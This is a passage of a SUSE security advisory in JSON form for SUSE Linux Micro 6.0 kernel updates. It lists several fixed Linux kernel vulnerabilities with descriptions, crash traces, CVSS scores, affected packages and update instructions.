"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53819",
"url": "https://www.suse.com/security/cve/CVE-2023-53819"
},
{
"category": "external",
"summary": "SUSE Bug 1254712 for CVE-2023-53819",
"url": "https://bugzilla.suse.com/1254712"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-53819"
},
{
"cve": "CVE-2023-53821",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53821"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nip6_vti: fix slab-use-after-free in decode_session6\n\nWhen ipv6_vti device is set to the qdisc of the sfb type, the cb field\nof the sent skb may be modified during enqueuing. Then,\nslab-use-after-free may occur when ipv6_vti device sends IPv6 packets.\n\nThe stack information is as follows:\nBUG: KASAN: slab-use-after-free in decode_session6+0x103f/0x1890\nRead of size 1 at addr ffff88802e08edc2 by task swapper/0/0\nCPU: 0 PID: 0 Comm: swapper/0 Not tainted 6.4.0-next-20230707-00001-g84e2cad7f979 #410\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-1.fc33 04/01/2014\nCall Trace:\n\u003cIRQ\u003e\ndump_stack_lvl+0xd9/0x150\nprint_address_description.constprop.0+0x2c/0x3c0\nkasan_report+0x11d/0x130\ndecode_session6+0x103f/0x1890\n__xfrm_decode_session+0x54/0xb0\nvti6_tnl_xmit+0x3e6/0x1ee0\ndev_hard_start_xmit+0x187/0x700\nsch_direct_xmit+0x1a3/0xc30\n__qdisc_run+0x510/0x17a0\n__dev_queue_xmit+0x2215/0x3b10\nneigh_connected_output+0x3c2/0x550\nip6_finish_output2+0x55a/0x1550\nip6_finish_output+0x6b9/0x1270\nip6_output+0x1f1/0x540\nndisc_send_skb+0xa63/0x1890\nndisc_send_rs+0x132/0x6f0\naddrconf_rs_timer+0x3f1/0x870\ncall_timer_fn+0x1a0/0x580\nexpire_timers+0x29b/0x4b0\nrun_timer_softirq+0x326/0x910\n__do_softirq+0x1d4/0x905\nirq_exit_rcu+0xb7/0x120\nsysvec_apic_timer_interrupt+0x97/0xc0\n\u003c/IRQ\u003e\nAllocated by task 9176:\nkasan_save_stack+0x22/0x40\nkasan_set_track+0x25/0x30\n__kasan_slab_alloc+0x7f/0x90\nkmem_cache_alloc_node+0x1cd/0x410\nkmalloc_reserve+0x165/0x270\n__alloc_skb+0x129/0x330\nnetlink_sendmsg+0x9b1/0xe30\nsock_sendmsg+0xde/0x190\n____sys_sendmsg+0x739/0x920\n___sys_sendmsg+0x110/0x1b0\n__sys_sendmsg+0xf7/0x1c0\ndo_syscall_64+0x39/0xb0\nentry_SYSCALL_64_after_hwframe+0x63/0xcd\nFreed by task 9176:\nkasan_save_stack+0x22/0x40\nkasan_set_track+0x25/0x30\nkasan_save_free_info+0x2b/0x40\n____kasan_slab_free+0x160/0x1c0\nslab_free_freelist_hook+0x11b/0x220\nkmem_cache_free+0xf0/0x490\nskb_free_head+0x17f/0x1b0\nskb_release_data+0x59c/0x850\nconsume_skb+0xd2/0x170\nnetlink_unicast+0x54f/0x7f0\nnetlink_sendmsg+0x926/0xe30\nsock_sendmsg+0xde/0x190\n____sys_sendmsg+0x739/0x920\n___sys_sendmsg+0x110/0x1b0\n__sys_sendmsg+0xf7/0x1c0\ndo_syscall_64+0x39/0xb0\nentry_SYSCALL_64_after_hwframe+0x63/0xcd\nThe buggy address belongs to the object at ffff88802e08ed00\nwhich belongs to the cache skbuff_small_head of size 640\nThe buggy address is located 194 bytes inside of\nfreed 640-byte region [ffff88802e08ed00, ffff88802e08ef80)\n\nAs commit f855691975bb (\"xfrm6: Fix the nexthdr offset in\n_decode_session6.\") showed, xfrm_decode_session was originally intended\nonly for the receive path. IP6CB(skb)-\u003enhoff is not set during\ntransmission. Therefore, set the cb field in the skb to 0 before\nsending packets.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53821",
"url": "https://www.suse.com/security/cve/CVE-2023-53821"
},
{
"category": "external",
"summary": "SUSE Bug 1254669 for CVE-2023-53821",
"url": "https://bugzilla.suse.com/1254669"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-53821"
},
{
"cve": "CVE-2023-53823",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53823"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nblock/rq_qos: protect rq_qos apis with a new lock\n\ncommit 50e34d78815e (\"block: disable the elevator int del_gendisk\")\nmove rq_qos_exit() from disk_release() to del_gendisk(), this will\nintroduce some problems:\n\n1) If rq_qos_add() is triggered by enabling iocost/iolatency through\n cgroupfs, then it can concurrent with del_gendisk(), it\u0027s not safe to\n write \u0027q-\u003erq_qos\u0027 concurrently.\n\n2) Activate cgroup policy that is relied on rq_qos will call\n rq_qos_add() and blkcg_activate_policy(), and if rq_qos_exit() is\n called in the middle, null-ptr-dereference will be triggered in\n blkcg_activate_policy().\n\n3) blkg_conf_open_bdev() can call blkdev_get_no_open() first to find the\n disk, then if rq_qos_exit() from del_gendisk() is done before\n rq_qos_add(), then memory will be leaked.\n\nThis patch add a new disk level mutex \u0027rq_qos_mutex\u0027:\n\n1) The lock will protect rq_qos_exit() directly.\n\n2) For wbt that doesn\u0027t relied on blk-cgroup, rq_qos_add() can only be\n called from disk initialization for now because wbt can\u0027t be\n destructed until rq_qos_exit(), so it\u0027s safe not to protect wbt for\n now. Hoever, in case that rq_qos dynamically destruction is supported\n in the furture, this patch also protect rq_qos_add() from wbt_init()\n directly, this is enough because blk-sysfs already synchronize\n writers with disk removal.\n\n3) For iocost and iolatency, in order to synchronize disk removal and\n cgroup configuration, the lock is held after blkdev_get_no_open()\n from blkg_conf_open_bdev(), and is released in blkg_conf_exit().\n In order to fix the above memory leak, disk_live() is checked after\n holding the new lock.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53823",
"url": "https://www.suse.com/security/cve/CVE-2023-53823"
},
{
"category": "external",
"summary": "SUSE Bug 1254691 for CVE-2023-53823",
"url": "https://bugzilla.suse.com/1254691"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-53823"
},
{
"cve": "CVE-2023-53825",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53825"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nkcm: Fix error handling for SOCK_DGRAM in kcm_sendmsg().\n\nsyzkaller found a memory leak in kcm_sendmsg(), and commit c821a88bd720\n(\"kcm: Fix memory leak in error path of kcm_sendmsg()\") suppressed it by\nupdating kcm_tx_msg(head)-\u003elast_skb if partial data is copied so that the\nfollowing sendmsg() will resume from the skb.\n\nHowever, we cannot know how many bytes were copied when we get the error.\nThus, we could mess up the MSG_MORE queue.\n\nWhen kcm_sendmsg() fails for SOCK_DGRAM, we should purge the queue as we\ndo so for UDP by udp_flush_pending_frames().\n\nEven without this change, when the error occurred, the following sendmsg()\nresumed from a wrong skb and the queue was messed up. However, we have\nyet to get such a report, and only syzkaller stumbled on it. So, this\ncan be changed safely.\n\nNote this does not change SOCK_SEQPACKET behaviour.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53825",
"url": "https://www.suse.com/security/cve/CVE-2023-53825"
},
{
"category": "external",
"summary": "SUSE Bug 1254707 for CVE-2023-53825",
"url": "https://bugzilla.suse.com/1254707"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-53825"
},
{
"cve": "CVE-2023-53828",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53828"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nBluetooth: hci_sync: Avoid use-after-free in dbg for hci_add_adv_monitor()\n\nKSAN reports use-after-free in hci_add_adv_monitor().\n\nWhile adding an adv monitor,\n hci_add_adv_monitor() calls -\u003e\n msft_add_monitor_pattern() calls -\u003e\n msft_add_monitor_sync() calls -\u003e\n msft_le_monitor_advertisement_cb() calls in an error case -\u003e\n hci_free_adv_monitor() which frees the *moniter.\n\nThis is referenced by bt_dev_dbg() in hci_add_adv_monitor().\n\nFix the bt_dev_dbg() by using handle instead of monitor-\u003ehandle.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53828",
"url": "https://www.suse.com/security/cve/CVE-2023-53828"
},
{
"category": "external",
"summary": "SUSE Bug 1254623 for CVE-2023-53828",
"url": "https://bugzilla.suse.com/1254623"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-53828"
},
{
"cve": "CVE-2023-53831",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53831"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: read sk-\u003esk_family once in sk_mc_loop()\n\nsyzbot is playing with IPV6_ADDRFORM quite a lot these days,\nand managed to hit the WARN_ON_ONCE(1) in sk_mc_loop()\n\nWe have many more similar issues to fix.\n\nWARNING: CPU: 1 PID: 1593 at net/core/sock.c:782 sk_mc_loop+0x165/0x260\nModules linked in:\nCPU: 1 PID: 1593 Comm: kworker/1:3 Not tainted 6.1.40-syzkaller #0\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 07/26/2023\nWorkqueue: events_power_efficient gc_worker\nRIP: 0010:sk_mc_loop+0x165/0x260 net/core/sock.c:782\nCode: 34 1b fd 49 81 c7 18 05 00 00 4c 89 f8 48 c1 e8 03 42 80 3c 20 00 74 08 4c 89 ff e8 25 36 6d fd 4d 8b 37 eb 13 e8 db 33 1b fd \u003c0f\u003e 0b b3 01 eb 34 e8 d0 33 1b fd 45 31 f6 49 83 c6 38 4c 89 f0 48\nRSP: 0018:ffffc90000388530 EFLAGS: 00010246\nRAX: ffffffff846d9b55 RBX: 0000000000000011 RCX: ffff88814f884980\nRDX: 0000000000000102 RSI: ffffffff87ae5160 RDI: 0000000000000011\nRBP: ffffc90000388550 R08: 0000000000000003 R09: ffffffff846d9a65\nR10: 0000000000000002 R11: ffff88814f884980 R12: dffffc0000000000\nR13: ffff88810dbee000 R14: 0000000000000010 R15: ffff888150084000\nFS: 0000000000000000(0000) GS:ffff8881f6b00000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 0000000020000180 CR3: 000000014ee5b000 CR4: 00000000003506e0\nDR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\nDR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\nCall Trace:\n\u003cIRQ\u003e\n[\u003cffffffff8507734f\u003e] ip6_finish_output2+0x33f/0x1ae0 net/ipv6/ip6_output.c:83\n[\u003cffffffff85062766\u003e] __ip6_finish_output net/ipv6/ip6_output.c:200 [inline]\n[\u003cffffffff85062766\u003e] ip6_finish_output+0x6c6/0xb10 net/ipv6/ip6_output.c:211\n[\u003cffffffff85061f8c\u003e] NF_HOOK_COND include/linux/netfilter.h:298 [inline]\n[\u003cffffffff85061f8c\u003e] ip6_output+0x2bc/0x3d0 net/ipv6/ip6_output.c:232\n[\u003cffffffff852071cf\u003e] dst_output include/net/dst.h:444 [inline]\n[\u003cffffffff852071cf\u003e] ip6_local_out+0x10f/0x140 net/ipv6/output_core.c:161\n[\u003cffffffff83618fb4\u003e] ipvlan_process_v6_outbound drivers/net/ipvlan/ipvlan_core.c:483 [inline]\n[\u003cffffffff83618fb4\u003e] ipvlan_process_outbound drivers/net/ipvlan/ipvlan_core.c:529 [inline]\n[\u003cffffffff83618fb4\u003e] ipvlan_xmit_mode_l3 drivers/net/ipvlan/ipvlan_core.c:602 [inline]\n[\u003cffffffff83618fb4\u003e] ipvlan_queue_xmit+0x1174/0x1be0 drivers/net/ipvlan/ipvlan_core.c:677\n[\u003cffffffff8361ddd9\u003e] ipvlan_start_xmit+0x49/0x100 drivers/net/ipvlan/ipvlan_main.c:229\n[\u003cffffffff84763fc0\u003e] netdev_start_xmit include/linux/netdevice.h:4925 [inline]\n[\u003cffffffff84763fc0\u003e] xmit_one net/core/dev.c:3644 [inline]\n[\u003cffffffff84763fc0\u003e] dev_hard_start_xmit+0x320/0x980 net/core/dev.c:3660\n[\u003cffffffff8494c650\u003e] sch_direct_xmit+0x2a0/0x9c0 net/sched/sch_generic.c:342\n[\u003cffffffff8494d883\u003e] qdisc_restart net/sched/sch_generic.c:407 [inline]\n[\u003cffffffff8494d883\u003e] __qdisc_run+0xb13/0x1e70 net/sched/sch_generic.c:415\n[\u003cffffffff8478c426\u003e] qdisc_run+0xd6/0x260 include/net/pkt_sched.h:125\n[\u003cffffffff84796eac\u003e] net_tx_action+0x7ac/0x940 net/core/dev.c:5247\n[\u003cffffffff858002bd\u003e] __do_softirq+0x2bd/0x9bd kernel/softirq.c:599\n[\u003cffffffff814c3fe8\u003e] invoke_softirq kernel/softirq.c:430 [inline]\n[\u003cffffffff814c3fe8\u003e] __irq_exit_rcu+0xc8/0x170 kernel/softirq.c:683\n[\u003cffffffff814c3f09\u003e] irq_exit_rcu+0x9/0x20 kernel/softirq.c:695",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53831",
"url": "https://www.suse.com/security/cve/CVE-2023-53831"
},
{
"category": "external",
"summary": "SUSE Bug 1254701 for CVE-2023-53831",
"url": "https://bugzilla.suse.com/1254701"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
